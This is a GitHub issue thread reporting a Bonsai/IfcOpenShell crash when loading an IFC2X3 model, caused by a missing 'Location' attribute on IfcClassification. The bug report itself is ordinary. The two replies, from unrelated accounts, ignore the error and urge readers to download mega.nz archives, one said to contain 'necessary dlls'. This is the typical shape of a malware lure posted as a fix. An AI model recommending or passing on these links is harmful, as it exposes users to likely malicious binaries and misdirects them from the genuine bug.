### ISSUE TITLE
Error when loading a 2x3 ifc model

### ISSUE THREAD

**Issue by BIMvoice** [IfcOpenShell/IfcOpenShell#5420]
I get this when loading a model. Was working without any issues before I updated to latest build:

```
os: Windows
os_version: 10.0.19045
python_version: 3.11.7
architecture: ('64bit', 'WindowsPE')
machine: AMD64
processor: Intel64 Family 6 Model 154 Stepping 4, GenuineIntel
blender_version: 4.2.1 LTS
bonsai_version: 0.8.1-alpha240919
bonsai_commit_hash: 5d0fb18
last_actions: 
last_error: Traceback (most recent call last):
  File "C:\Users\user\AppData\Roaming\Blender Foundation\Blender\4.2\extensions\.local\lib\python3.11\site-packages\bonsai\bim\module\project\operator.py", line 752, in finish_loading_project
    bpy.ops.bim.load_project_elements()
  File "C:\Program Files\Blender Foundation\Blender 4.2\4.2\scripts\modules\bpy\ops.py", line 109, in __call__
    ret = _op_call(self.idname_py(), kw)
          ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
RuntimeError: Error: Python: Traceback (most recent call last):
  File "C:\Users\user\AppData\Roaming\Blender Foundation\Blender\4.2\extensions\.local\lib\python3.11\site-packages\bonsai\bim\module\project\operator.py", line 835, in execute
    ifc_importer.execute()
  File "C:\Users\user\AppData\Roaming\Blender Foundation\Blender\4.2\extensions\.local\lib\python3.11\site-packages\bonsai\bim\import_ifc.py", line 285, in execute
    tool.Loader.setup_active_bsdd_classification()
  File "C:\Users\user\AppData\Roaming\Blender Foundation\Blender\4.2\extensions\.local\lib\python3.11\site-packages\bonsai\tool\loader.py", line 935, in setup_active_bsdd_classification
    (uri := getattr(c, attr_name))
            ^^^^^^^^^^^^^^^^^^^^^
  File "C:\Users\user\AppData\Roaming\Blender Foundation\Blender\4.2\extensions\.local\lib\python3.11\site-packages\ifcopenshell\entity_instance.py", line 238, in __getattr__
    raise AttributeError(
AttributeError: entity instance of type 'IFC2X3.IfcClassification' has no attribute 'Location'
Location: C:\Program Files\Blender Foundation\Blender 4.2\4.2\scripts\modules\bpy\ops.py:109


ifc: file.ifc
schema: IFC2X3
preprocessor_version: ODA SDAI 22.12
originating_system: Autodesk Revit 23.1.10.4 (ENU) - IFC 23.3.0.0
```

**Comment by Aljallaf100** [comment]
install this
https://mega.co.nz/#!9vE0jIrD!nkSuAAbrT1Sjn01VjaQfVQGAFLqvdIF4EkMeSLuKCWw
If you don't have the c compliator, install it.(gcc or clang)

**Comment by wardahub-design** [comment]
maybe this will help

https://mega.nz/file/1vkGlJTL#yU-SJLlIilF0mx5qwpPOd3BM8iKZqOJLEQUStR76rrQ
I put the necessary dlls in the archive
